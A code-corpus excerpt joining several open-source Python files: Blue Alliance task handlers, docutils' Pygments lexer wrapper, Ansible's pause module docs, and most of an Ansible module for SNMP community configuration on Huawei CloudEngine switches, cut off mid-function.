status_sitevar.contents = list(new_status)
status_sitevar.put()
# Clear API Response cache
ApiStatusController.clear_cache_if_needed(old_status, new_status)
class RebuildPlayoffAdvancementEnqueue(webapp.RequestHandler):
"""
Enqueue rebuilding playoff advancement details for an event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
return
taskqueue.add(url='/tasks/math/do/playoff_advancement_update/{}'.format(event.key_name),
method='GET')
self.response.out.write("Enqueued time prediction for {}".format(event.key_name))
class RebuildPlayoffAdvancementDo(webapp.RequestHandler):
"""
Rebuilds playoff advancement for a given event
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
event_future = EventQuery(event_key).fetch_async(return_updated=True)
matches_future = EventMatchesQuery(event_key).fetch_async(return_updated=True)
event, _ = event_future.get_result()
matches, _ = matches_future.get_result()
cleaned_matches = MatchHelper.deleteInvalidMatches(matches, event)
matches = MatchHelper.organizeMatches(cleaned_matches)
bracket_table, playoff_advancement, _, _ = PlayoffAdvancementHelper.generatePlayoffAdvancement(event, matches)
event_details = EventDetails(
id=event.key_name,
playoff_advancement={
'advancement': playoff_advancement,
'bracket': bracket_table,
},
)
EventDetailsManipulator.createOrUpdate(event_details)
self.response.out.write("New playoff advancement for {}\n{}".format(event.key_name, json.dumps(event_details.playoff_advancement, indent=2, sort_keys=True)))
class BlueZoneUpdateDo(webapp.RequestHandler):
"""
Update the current "best match"
"""
def get(self):
live_events = EventHelper.getEventsWithinADay()
try:
BlueZoneHelper.update_bluezone(live_events)
except Exception, e:
logging.error("BlueZone update failed")
logging.exception(e)
class SuggestionQueueDailyNag(webapp.RequestHandler):
"""
Daily job to nag a slack channel about pending suggestions
"""
def get(self):
hook_sitevars = Sitevar.get_by_id('slack.hookurls')
if not hook_sitevars:
return
channel_url = hook_sitevars.contents.get('suggestion-nag')
if not channel_url:
return
counts = map(lambda t: SuggestionFetcher.count(Suggestion.REVIEW_PENDING, t),
Suggestion.MODELS)
nag_text = "There are pending suggestions!\n"
suggestions_to_nag = False
for count, name in zip(counts, Suggestion.MODELS):
if count > 0:
suggestions_to_nag = True
nag_text += "*{0}*: {1} pending suggestions\n".format(
Suggestion.MODEL_NAMES.get(name),
count
)
if suggestions_to_nag:
nag_text += "_Review them on <https://www.thebluealliance.com/suggest/review|TBA>_"
OutgoingNotificationHelper.send_slack_alert(channel_url, nag_text)
class RemapTeamsDo(webapp.RequestHandler):
"""
Remaps teams within an Event. Useful for offseason events.
eg: 9254 -> 254B
"""
def get(self, event_key):
event = Event.get_by_id(event_key)
if not event:
self.abort(404)
if not event.remap_teams:
return
event.prepAwardsMatchesTeams()
# Remap matches
EventHelper.remapteams_matches(event.matches, event.remap_teams)
MatchManipulator.createOrUpdate(event.matches)
# Remap alliance selections
if event.alliance_selections:
EventHelper.remapteams_alliances(event.alliance_selections, event.remap_teams)
# Remap rankings
if event.rankings:
EventHelper.remapteams_rankings(event.rankings, event.remap_teams)
if event.details and event.details.rankings2:
EventHelper.remapteams_rankings2(event.details.rankings2, event.remap_teams)
EventDetailsManipulator.createOrUpdate(event.details)
# Remap awards
EventHelper.remapteams_awards(event.awards, event.remap_teams)
AwardManipulator.createOrUpdate(event.awards, auto_union=False)
| mit |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/docutils/utils/code_analyzer.py | 9 | 4929 | #!/usr/bin/python
# coding: utf-8
"""Lexical analysis of formal languages (i.e. code) using Pygments."""
# :Author: Georg Brandl; Felix Wiemann; Günter Milde
# :Date: $Date: 2015-04-20 16:05:27 +0200 (Mo, 20. Apr 2015) $
# :Copyright: This module has been placed in the public domain.
from docutils import ApplicationError
try:
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters.html import _get_ttype_class
with_pygments = True
except (ImportError, SyntaxError): # pygments 2.0.1 fails with Py 3.1 and 3.2
with_pygments = False
# Filter the following token types from the list of class arguments:
unstyled_tokens = ['token', # Token (base token type)
'text', # Token.Text
''] # short name for Token and Text
# (Add, e.g., Token.Punctuation with ``unstyled_tokens += 'punctuation'``.)
class LexerError(ApplicationError):
pass
class Lexer(object):
"""Parse `code` lines and yield "classified" tokens.
Arguments
code -- string of source code to parse,
language -- formal language the code is written in,
tokennames -- either 'long', 'short', or 'none' (see below).
Merge subsequent tokens of the same token-type.
Iterating over an instance yields the tokens as ``(tokentype, value)``
tuples. The value of `tokennames` configures the naming of the tokentype:
'long': downcased full token type name,
'short': short name defined by pygments.token.STANDARD_TYPES
(= class argument used in pygments html output),
'none': skip lexical analysis.
"""
def __init__(self, code, language, tokennames='short'):
"""
Set up a lexical analyzer for `code` in `language`.
"""
self.code = code
self.language = language
self.tokennames = tokennames
self.lexer = None
# get lexical analyzer for `language`:
if language in ('', 'text') or tokennames == 'none':
return
if not with_pygments:
raise LexerError('Cannot analyze code. '
'Pygments package not found.')
try:
self.lexer = get_lexer_by_name(self.language)
except pygments.util.ClassNotFound:
raise LexerError('Cannot analyze code. '
'No Pygments lexer found for "%s".' % language)
# Since version 1.2. (released Jan 01, 2010) Pygments has a
# TokenMergeFilter. However, this requires Python >= 2.4. When Docutils
# requires same minimal version, ``self.merge(tokens)`` in __iter__ can
# be replaced by ``self.lexer.add_filter('tokenmerge')`` in __init__.
def merge(self, tokens):
"""Merge subsequent tokens of same token-type.
Also strip the final newline (added by pygments).
"""
tokens = iter(tokens)
(lasttype, lastval) = tokens.next()
for ttype, value in tokens:
if ttype is lasttype:
lastval += value
else:
yield(lasttype, lastval)
(lasttype, lastval) = (ttype, value)
if lastval.endswith('\n'):
lastval = lastval[:-1]
if lastval:
yield(lasttype, lastval)
def __iter__(self):
"""Parse self.code and yield "classified" tokens.
"""
if self.lexer is None:
yield ([], self.code)
return
tokens = pygments.lex(self.code, self.lexer)
for tokentype, value in self.merge(tokens):
if self.tokennames == 'long': # long CSS class args
classes = str(tokentype).lower().split('.')
else: # short CSS class args
classes = [_get_ttype_class(tokentype)]
classes = [cls for cls in classes if cls not in unstyled_tokens]
yield (classes, value)
class NumberLines(object):
"""Insert linenumber-tokens at the start of every code line.
Arguments
tokens -- iterable of ``(classes, value)`` tuples
startline -- first line number
endline -- last line number
Iterating over an instance yields the tokens with a
``(['ln'], '<the line number>')`` token added for every code line.
Multi-line tokens are split."""
def __init__(self, tokens, startline, endline):
self.tokens = tokens
self.startline = startline
# pad linenumbers, e.g. endline == 100 -> fmt_str = '%3d '
self.fmt_str = '%%%dd ' % len(str(endline))
def __iter__(self):
lineno = self.startline
yield (['ln'], self.fmt_str % lineno)
for ttype, value in self.tokens:
lines = value.split('\n')
for line in lines[:-1]:
yield (ttype, line + '\n')
lineno += 1
yield (['ln'], self.fmt_str % lineno)
yield (ttype, lines[-1])
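# Illustrative usage sketch (not part of the original module): it shows how the
# Lexer and NumberLines classes above can be combined to emit numbered,
# CSS-classified tokens. It assumes Pygments is installed and that 'python' is
# a valid Pygments lexer name; the sample source string is made up.
if __name__ == '__main__':
    sample = "def add(a, b):\n    return a + b\n"
    lexer = Lexer(sample, 'python', tokennames='short')
    for classes, value in NumberLines(lexer, 1, 2):
        print("%s %r" % (classes, value))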
| mit |
rupran/ansible | lib/ansible/modules/utilities/logic/pause.py | 6 | 3075 | # -*- mode: python -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: pause
short_description: Pause playbook execution
description:
- Pauses playbook execution for a set amount of time, or until a prompt is acknowledged. All parameters are optional. The default behavior is to pause with a prompt.
- "You can use C(ctrl+c) if you wish to advance a pause earlier than it is set to expire or if you need to abort a playbook run entirely. To continue early: press C(ctrl+c) and then C(c). To abort a playbook: press C(ctrl+c) and then C(a)."
- "The pause module integrates into async/parallelized playbooks without any special considerations (see also: Rolling Updates). When using pauses with the C(serial) playbook parameter (as in rolling updates) you are only prompted once for the current group of hosts."
version_added: "0.8"
options:
minutes:
description:
- A positive number of minutes to pause for.
required: false
default: null
seconds:
description:
- A positive number of seconds to pause for.
required: false
default: null
prompt:
description:
- Optional text to use for the prompt message.
required: false
default: null
author: "Tim Bielawa (@tbielawa)"
notes:
- Starting in 2.2, if you specify 0 or negative for minutes or seconds, it will wait for 1 second, previously it would wait indefinitely.
'''
EXAMPLES = '''
# Pause for 5 minutes to build app cache.
- pause:
minutes: 5
# Pause until you can verify updates to an application were successful.
- pause:
# A helpful reminder of what to look out for post-update.
- pause:
prompt: "Make sure org.foo.FooOverload exception is not present"
'''
RETURN = '''
user_input:
description: User input from interactive console
returned: if no waiting time set
type: string
sample: Example user input
start:
description: Time when started pausing
returned: always
type: string
sample: 2017-02-23 14:35:07.298862
stop:
description: Time when ended pausing
returned: always
type: string
sample: 2017-02-23 14:35:09.552594
delta:
description: Time paused in seconds
returned: always
type: string
sample: 2
stdout:
description: Output of pause module
returned: always
type: string
sample: Paused for 0.04 minutes
'''
| gpl-3.0 |
tareqalayan/ansible | lib/ansible/modules/network/cloudengine/ce_snmp_community.py | 43 | 32872 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ce_snmp_community
version_added: "2.4"
short_description: Manages SNMP community configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP community configuration on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
acl_number:
description:
- Access control list number.
community_name:
description:
- Unique name to identify the community.
access_right:
description:
- Access right read or write.
choices: ['read','write']
community_mib_view:
description:
- Mib view name.
group_name:
description:
- Unique name to identify the SNMPv3 group.
security_level:
description:
- Security level indicating whether to use authentication and encryption.
choices: ['noAuthNoPriv', 'authentication', 'privacy']
read_view:
description:
- Mib view name for read.
write_view:
description:
- Mib view name for write.
notify_view:
description:
- Mib view name for notification.
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp community test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP community"
ce_snmp_community:
state: present
community_name: Wdz123456789
access_right: write
provider: "{{ cli }}"
- name: "Undo SNMP community"
ce_snmp_community:
state: absent
community_name: Wdz123456789
access_right: write
provider: "{{ cli }}"
- name: "Config SNMP group"
ce_snmp_community:
state: present
group_name: wdz_group
security_level: noAuthNoPriv
acl_number: 2000
provider: "{{ cli }}"
- name: "Undo SNMP group"
ce_snmp_community:
state: absent
group_name: wdz_group
security_level: noAuthNoPriv
acl_number: 2000
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"acl_number": "2000", "group_name": "wdz_group",
"security_level": "noAuthNoPriv", "state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"snmp v3 group": {"snmp_group": ["wdz_group", "noAuthNoPriv", "2000"]}}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent group v3 wdz_group noauthentication acl 2000"]
'''
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import get_nc_config, set_nc_config, ce_argument_spec
# get snmp community
CE_GET_SNMP_COMMUNITY_HEADER = """
<filter type="subtree">
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community>
<communityName></communityName>
<accessRight></accessRight>
"""
CE_GET_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</filter>
"""
# merge snmp community
CE_MERGE_SNMP_COMMUNITY_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community operation="merge">
<communityName>%s</communityName>
<accessRight>%s</accessRight>
"""
CE_MERGE_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</config>
"""
# create snmp community
CE_CREATE_SNMP_COMMUNITY_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community operation="create">
<communityName>%s</communityName>
<accessRight>%s</accessRight>
"""
CE_CREATE_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</config>
"""
# delete snmp community
CE_DELETE_SNMP_COMMUNITY_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<communitys>
<community operation="delete">
<communityName>%s</communityName>
<accessRight>%s</accessRight>
"""
CE_DELETE_SNMP_COMMUNITY_TAIL = """
</community>
</communitys>
</snmp>
</config>
"""
# get snmp v3 group
CE_GET_SNMP_V3_GROUP_HEADER = """
<filter type="subtree">
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group>
<groupName></groupName>
<securityLevel></securityLevel>
"""
CE_GET_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</filter>
"""
# merge snmp v3 group
CE_MERGE_SNMP_V3_GROUP_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group operation="merge">
<groupName>%s</groupName>
<securityLevel>%s</securityLevel>
"""
CE_MERGE_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</config>
"""
# create snmp v3 group
CE_CREATE_SNMP_V3_GROUP_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group operation="create">
<groupName>%s</groupName>
<securityLevel>%s</securityLevel>
"""
CE_CREATE_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</config>
"""
# delete snmp v3 group
CE_DELETE_SNMP_V3_GROUP_HEADER = """
<config>
<snmp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<snmpv3Groups>
<snmpv3Group operation="delete">
<groupName>%s</groupName>
<securityLevel>%s</securityLevel>
"""
CE_DELETE_SNMP_V3_GROUP_TAIL = """
</snmpv3Group>
</snmpv3Groups>
</snmp>
</config>
"""
class SnmpCommunity(object):
""" Manages SNMP community configuration """
def netconf_get_config(self, **kwargs):
""" Get configure through netconf """
module = kwargs["module"]
conf_str = kwargs["conf_str"]
xml_str = get_nc_config(module, conf_str)
return xml_str
def netconf_set_config(self, **kwargs):
""" Set configure through netconf """
module = kwargs["module"]
conf_str = kwargs["conf_str"]
xml_str = set_nc_config(module, conf_str)
return xml_str
def check_snmp_community_args(self, **kwargs):
""" Check snmp community args """
module = kwargs["module"]
result = dict()
need_cfg = False
result["community_info"] = []
state = module.params['state']
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
if community_name and access_right:
if len(community_name) > 32 or len(community_name) == 0:
module.fail_json(
msg='Error: The len of community_name %s is out of [1 - 32].' % community_name)
if acl_number:
if acl_number.isdigit():
if int(acl_number) > 2999 or int(acl_number) < 2000:
module.fail_json(
msg='Error: The value of acl_number %s is out of [2000 - 2999].' % acl_number)
else:
if not acl_number[0].isalpha() or len(acl_number) > 32 or len(acl_number) < 1:
module.fail_json(
msg='Error: The len of acl_number %s is out of [1 - 32] or is invalid.' % acl_number)
if community_mib_view:
if len(community_mib_view) > 32 or len(community_mib_view) == 0:
module.fail_json(
msg='Error: The len of community_mib_view %s is out of [1 - 32].' % community_mib_view)
conf_str = CE_GET_SNMP_COMMUNITY_HEADER
if acl_number:
conf_str += "<aclNumber></aclNumber>"
if community_mib_view:
conf_str += "<mibViewName></mibViewName>"
conf_str += CE_GET_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_get_config(module=module, conf_str=conf_str)
if "<data/>" in recv_xml:
if state == "present":
need_cfg = True
else:
xml_str = recv_xml.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
community_info = root.findall("data/snmp/communitys/community")
if community_info:
for tmp in community_info:
tmp_dict = dict()
for site in tmp:
if site.tag in ["communityName", "accessRight", "aclNumber", "mibViewName"]:
tmp_dict[site.tag] = site.text
result["community_info"].append(tmp_dict)
if result["community_info"]:
for tmp in result["community_info"]:
if "communityName" in tmp.keys():
need_cfg = True
if "accessRight" in tmp.keys():
if state == "present":
if tmp["accessRight"] != access_right:
need_cfg = True
else:
if tmp["accessRight"] == access_right:
need_cfg = True
if acl_number:
if "aclNumber" in tmp.keys():
if state == "present":
if tmp["aclNumber"] != acl_number:
need_cfg = True
else:
if tmp["aclNumber"] == acl_number:
need_cfg = True
if community_mib_view:
if "mibViewName" in tmp.keys():
if state == "present":
if tmp["mibViewName"] != community_mib_view:
need_cfg = True
else:
if tmp["mibViewName"] == community_mib_view:
need_cfg = True
result["need_cfg"] = need_cfg
return result
def check_snmp_v3_group_args(self, **kwargs):
""" Check snmp v3 group args """
module = kwargs["module"]
result = dict()
need_cfg = False
result["group_info"] = []
state = module.params['state']
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
community_name = module.params['community_name']
access_right = module.params['access_right']
if group_name and security_level:
if community_name and access_right:
module.fail_json(
msg='Error: Community is used for v1/v2c, group_name is used for v3, do not '
'input at the same time.')
if len(group_name) > 32 or len(group_name) == 0:
module.fail_json(
msg='Error: The len of group_name %s is out of [1 - 32].' % group_name)
if acl_number:
if acl_number.isdigit():
if int(acl_number) > 2999 or int(acl_number) < 2000:
module.fail_json(
msg='Error: The value of acl_number %s is out of [2000 - 2999].' % acl_number)
else:
if not acl_number[0].isalpha() or len(acl_number) > 32 or len(acl_number) < 1:
module.fail_json(
msg='Error: The len of acl_number %s is out of [1 - 32] or is invalid.' % acl_number)
if read_view:
if len(read_view) > 32 or len(read_view) < 1:
module.fail_json(
msg='Error: The len of read_view %s is out of [1 - 32].' % read_view)
if write_view:
if len(write_view) > 32 or len(write_view) < 1:
module.fail_json(
msg='Error: The len of write_view %s is out of [1 - 32].' % write_view)
if notify_view:
if len(notify_view) > 32 or len(notify_view) < 1:
module.fail_json(
msg='Error: The len of notify_view %s is out of [1 - 32].' % notify_view)
conf_str = CE_GET_SNMP_V3_GROUP_HEADER
if acl_number:
conf_str += "<aclNumber></aclNumber>"
if read_view:
conf_str += "<readViewName></readViewName>"
if write_view:
conf_str += "<writeViewName></writeViewName>"
if notify_view:
conf_str += "<notifyViewName></notifyViewName>"
conf_str += CE_GET_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_get_config(module=module, conf_str=conf_str)
if "<data/>" in recv_xml:
if state == "present":
need_cfg = True
else:
xml_str = recv_xml.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
group_info = root.findall("data/snmp/snmpv3Groups/snmpv3Group")
if group_info:
for tmp in group_info:
tmp_dict = dict()
for site in tmp:
if site.tag in ["groupName", "securityLevel", "readViewName", "writeViewName",
"notifyViewName", "aclNumber"]:
tmp_dict[site.tag] = site.text
result["group_info"].append(tmp_dict)
if result["group_info"]:
for tmp in result["group_info"]:
if "groupName" in tmp.keys():
if state == "present":
if tmp["groupName"] != group_name:
need_cfg = True
else:
if tmp["groupName"] == group_name:
need_cfg = True
if "securityLevel" in tmp.keys():
if state == "present":
if tmp["securityLevel"] != security_level:
need_cfg = True
else:
if tmp["securityLevel"] == security_level:
need_cfg = True
if acl_number:
if "aclNumber" in tmp.keys():
if state == "present":
if tmp["aclNumber"] != acl_number:
need_cfg = True
else:
if tmp["aclNumber"] == acl_number:
need_cfg = True
if read_view:
if "readViewName" in tmp.keys():
if state == "present":
if tmp["readViewName"] != read_view:
need_cfg = True
else:
if tmp["readViewName"] == read_view:
need_cfg = True
if write_view:
if "writeViewName" in tmp.keys():
if state == "present":
if tmp["writeViewName"] != write_view:
need_cfg = True
else:
if tmp["writeViewName"] == write_view:
need_cfg = True
if notify_view:
if "notifyViewName" in tmp.keys():
if state == "present":
if tmp["notifyViewName"] != notify_view:
need_cfg = True
else:
if tmp["notifyViewName"] == notify_view:
need_cfg = True
result["need_cfg"] = need_cfg
return result
def merge_snmp_community(self, **kwargs):
""" Merge snmp community operation """
module = kwargs["module"]
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
conf_str = CE_MERGE_SNMP_COMMUNITY_HEADER % (
community_name, access_right)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if community_mib_view:
conf_str += "<mibViewName>%s</mibViewName>" % community_mib_view
conf_str += CE_MERGE_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Merge snmp community failed.')
community_safe_name = "******"
cmd = "snmp-agent community %s %s" % (access_right, community_safe_name)
if acl_number:
cmd += " acl %s" % acl_number
if community_mib_view:
cmd += " mib-view %s" % community_mib_view
return cmd
def create_snmp_community(self, **kwargs):
""" Create snmp community operation """
module = kwargs["module"]
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
conf_str = CE_CREATE_SNMP_COMMUNITY_HEADER % (
community_name, access_right)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if community_mib_view:
conf_str += "<mibViewName>%s</mibViewName>" % community_mib_view
conf_str += CE_CREATE_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Create snmp community failed.')
community_safe_name = "******"
cmd = "snmp-agent community %s %s" % (access_right, community_safe_name)
if acl_number:
cmd += " acl %s" % acl_number
if community_mib_view:
cmd += " mib-view %s" % community_mib_view
return cmd
def delete_snmp_community(self, **kwargs):
""" Delete snmp community operation """
module = kwargs["module"]
community_name = module.params['community_name']
access_right = module.params['access_right']
acl_number = module.params['acl_number']
community_mib_view = module.params['community_mib_view']
conf_str = CE_DELETE_SNMP_COMMUNITY_HEADER % (
community_name, access_right)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if community_mib_view:
conf_str += "<mibViewName>%s</mibViewName>" % community_mib_view
conf_str += CE_DELETE_SNMP_COMMUNITY_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Delete snmp community failed.')
community_safe_name = "******"
cmd = "undo snmp-agent community %s %s" % (
access_right, community_safe_name)
return cmd
def merge_snmp_v3_group(self, **kwargs):
""" Merge snmp v3 group operation """
module = kwargs["module"]
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
conf_str = CE_MERGE_SNMP_V3_GROUP_HEADER % (group_name, security_level)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if read_view:
conf_str += "<readViewName>%s</readViewName>" % read_view
if write_view:
conf_str += "<writeViewName>%s</writeViewName>" % write_view
if notify_view:
conf_str += "<notifyViewName>%s</notifyViewName>" % notify_view
conf_str += CE_MERGE_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Merge snmp v3 group failed.')
if security_level == "noAuthNoPriv":
security_level_cli = "noauthentication"
elif security_level == "authentication":
security_level_cli = "authentication"
elif security_level == "privacy":
security_level_cli = "privacy"
cmd = "snmp-agent group v3 %s %s" % (group_name, security_level_cli)
if read_view:
cmd += " read-view %s" % read_view
if write_view:
cmd += " write-view %s" % write_view
if notify_view:
cmd += " notify-view %s" % notify_view
if acl_number:
cmd += " acl %s" % acl_number
return cmd
def create_snmp_v3_group(self, **kwargs):
""" Create snmp v3 group operation """
module = kwargs["module"]
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
conf_str = CE_CREATE_SNMP_V3_GROUP_HEADER % (
group_name, security_level)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if read_view:
conf_str += "<readViewName>%s</readViewName>" % read_view
if write_view:
conf_str += "<writeViewName>%s</writeViewName>" % write_view
if notify_view:
conf_str += "<notifyViewName>%s</notifyViewName>" % notify_view
conf_str += CE_CREATE_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Create snmp v3 group failed.')
if security_level == "noAuthNoPriv":
security_level_cli = "noauthentication"
elif security_level == "authentication":
security_level_cli = "authentication"
elif security_level == "privacy":
security_level_cli = "privacy"
cmd = "snmp-agent group v3 %s %s" % (group_name, security_level_cli)
if read_view:
cmd += " read-view %s" % read_view
if write_view:
cmd += " write-view %s" % write_view
if notify_view:
cmd += " notify-view %s" % notify_view
if acl_number:
cmd += " acl %s" % acl_number
return cmd
def delete_snmp_v3_group(self, **kwargs):
""" Delete snmp v3 group operation """
module = kwargs["module"]
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
conf_str = CE_DELETE_SNMP_V3_GROUP_HEADER % (
group_name, security_level)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if read_view:
conf_str += "<readViewName>%s</readViewName>" % read_view
if write_view:
conf_str += "<writeViewName>%s</writeViewName>" % write_view
if notify_view:
conf_str += "<notifyViewName>%s</notifyViewName>" % notify_view
conf_str += CE_DELETE_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Delete snmp v3 group failed.')
if security_level == "noAuthNoPriv":
security_level_cli = "noauthentication"
elif security_level == "authentication":
security_level_cli = "authentication"
elif security_level == "privacy":
security_level_cli = "privacy"
cmd = "undo snmp-agent group v3 %s %s" % (
group_name, security_level_cli)
return cmd
def main():
""" main function """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
acl_number=dict(type='str'),
community_name=dict(type='str', no_log=True),
access_right=dict(choices=['read', 'write']),
community_mib_view=dict(type='str'),
group_name=dict(type='str'),
security_level=dict(
choices=['noAuthNoPriv', 'authentication', 'privacy']),
read_view=dict(type='str'),
write_view=dict(type='str'),
notify_view=dict(type='str')
)
argument_spec.update(ce_argument_spec)
required_together = [("community_name", "access_right"), ("security_level", "group_name")]
module = AnsibleModule(
argument_spec=argument_spec,
required_together=required_together,
supports_check_mode=True
)
changed = False
proposed = dict()
existing = dict()
end_state = dict()
updates = []
state = module.params['state']
acl_number = module.params['acl_number']
community_name = module.params['community_name']
community_mib_view = module.params['community_mib_view']
access_right = module.params['access_right']
group_name = module.params['group_name']
security_level = module.params['security_level']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
snmp_community_obj = SnmpCommunity()
if not snmp_community_obj:
module.fail_json(msg='Error: Init module failed.')
snmp_community_rst = snmp_community_obj.check_snmp_community_args(
module=module)
snmp_v3_group_rst = snmp_community_obj.check_snmp_v3_group_args(
module=module)
# get proposed
proposed["state"] = state
if acl_number:
proposed["acl_number"] = acl_number
if community_name:
proposed["community_name"] = community_name
if community_mib_view:
proposed["community_mib_view"] = community_mib_view
if access_right:
proposed["access_right"] = access_right
if group_name:
proposed["group_name"] = group_name
if security_level:
proposed["security_level"] = security_level
if read_view:
proposed["read_view"] = read_view
if write_view:
proposed["write_view"] = write_view
if notify_view:
proposed["notify_view"] = notify_view
# state exist snmp community config
exist_tmp = dict()
for item in snmp_community_rst:
if item != "need_cfg":
exist_tmp[item] = snmp_community_rst[item]
if exist_tmp:
existing["snmp community"] = exist_tmp
# state exist snmp v3 group config
exist_tmp = dict()
for item in snmp_v3_group_rst:
if item != "need_cfg":
exist_tmp[item] = snmp_v3_group_rst[item]
if exist_tmp:
existing["snmp v3 group"] = exist_tmp
if state == "present":
if snmp_community_rst["need_cfg"]:
